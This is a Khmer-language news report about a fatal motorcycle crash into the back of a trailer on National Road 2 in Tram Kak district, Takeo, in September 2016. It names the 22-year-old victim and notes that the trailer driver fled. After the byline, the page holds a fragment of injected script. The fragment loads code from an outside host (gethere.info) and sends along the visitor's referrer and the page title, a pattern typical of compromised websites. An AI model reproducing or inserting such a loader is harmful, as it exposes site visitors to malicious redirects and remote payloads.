ស្លាប់ទៀតហើយ! ដោយសារតែជិៈម៉ូតូទៅបុកគូដរ៉ឺម៉ក 

តាកែវ៖ យុវជនម្នាក់បានបើកម៉ូតូដោយខ្វះការប្រុងប្រយត្ន័ បានទៅបុករ៉ឺម៉កពីក្រោយពេញទំហឹង បណ្តាលឲ្យដួលបាក់ក ស្លាប់ភ្លាមនៅនឹងកន្លែងកើតហេតុ។ ហេតុការណ៍គ្រោះថ្នាក់ចរាចរណ៍នេះបានកើតឡើង កាលពីវេលាម៉ោង៧នឹង៣០នាទីយប់ ថ្ងៃទី២៦ ខែកញ្ញា ឆ្នាំ២០១៦ នៅតាមបណ្តោយផ្លូវជាតិលេខ២ ត្រង់ចន្លោះគីឡូម៉ែតលេខ៨៣នឹង៨៤ ស្ថិតនៅក្នុងភូមិគោកញ័រ ឃុំព្រៃស្លឹក ស្រុកទ្រាំង ខេត្តតាកែវ។

 

បើតាមសាក្សីនៅកន្លែងកើតហេតុបានប្រាប់ឲ្យដឹងថា មុនពេលកើតហេតុគេបានឃើញយុវជនម្នាក់បើកម៉ូតូម៉ាក Honda Dream ស៊េរី ឆ្នាំ២០១៣ តាមបណ្តោយផ្លូវជាតិលេខ២ ក្នុងទិសដៅពីជើងទៅត្បូង ក្នុងល្បឿនលឿនមធ្យម ស្រាប់តែមកដល់កន្លែងកើតហេតុបានបុករ៉ឺម៉កពីក្រោយពេញទំហឹង ដែលបើកស្របទិសគ្នា បណ្តាលឲ្យយុវជនបើកបរម៉ូតូដួលបោកទៅនឹងថ្នល់បាក់ ក ស្លាប់ភ្លាមនៅនឹងកន្លែងកើតហេតុ។

 

យោងតាមសមត្ថកិច្ចដែលបានចុះទៅដល់កន្លែងកើតហេតុបានឲ្យដឹងដែរថា ជនរងគ្រោះដែលស្លាប់មានឈ្មោះ ហែម សម្ភស្ស ភេទប្រុស អាយុ២២ឆ្នាំ រស់នៅភូមិដា ឃុំអង្គខ្នុរ ស្រុកទ្រាំង ខេត្តតាកែវ បើកបរម៉ូតូ ម៉ាកC125ពណ៍ខ្មៅ ស៊េរី2013 ពាក់ស្លាកលេខតាកែវ1J- 7146។ ចំណែកម្ចាស់រ៉ឺម៉ក ក្រោយពេលកើតហេតុបានរត់គេចខ្លួនបាត់ស្រមោល។

 

បន្ទាប់ពីសមត្ថកិច្ចជំនាញធ្វើការវាស់វែងរួច ក៍បានទាក់ទងទៅក្រុមគ្រួសារសព ដើម្បីទទួលយកទៅធ្វើបុណ្យតាមប្រពៃណី ។ ចំនែកមធ្យោបាយពាក់ព័ន្ធ ត្រូវបានសមត្ថកិច្ចជំនាញយកទៅរក្សាទុកនៅអធិការដ្ថាននគរបាលស្រុកទ្រាំង ដើម្បីរងចាំដោះស្រាយនៅពេលក្រោយ។

 

គួរបញ្ជាក់ផងដែរថា ក្នុងរយះពេលមួយអាទិត្យ នៅក្នុងស្រុកទ្រាំងនេះ មានករណីគ្រោះថ្នាក់ចរាចរណ៍ ជិះម៉ូតូទៅបុកគូដរ៉ឺម៉កពីក្រោយ មានបីលើក បណ្តាលឲ្យស្លាប់មនុស្សបួននាក់។(សូមបងប្អូនទាំងអស់គ្នា បើកបរដោយមានការប្រុងប្រយត្ន័ នោះ នឹងពំុមានអ្វីកើតឡើងទេ យើងនឹងសុខសប្បាយទាំងអស់គ្នា នៅរដូវបុណ្យភ្ជំុបិណ្ឌយើងនេះ)។ ដោយ៖សុខន

untitled1 untitled2s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More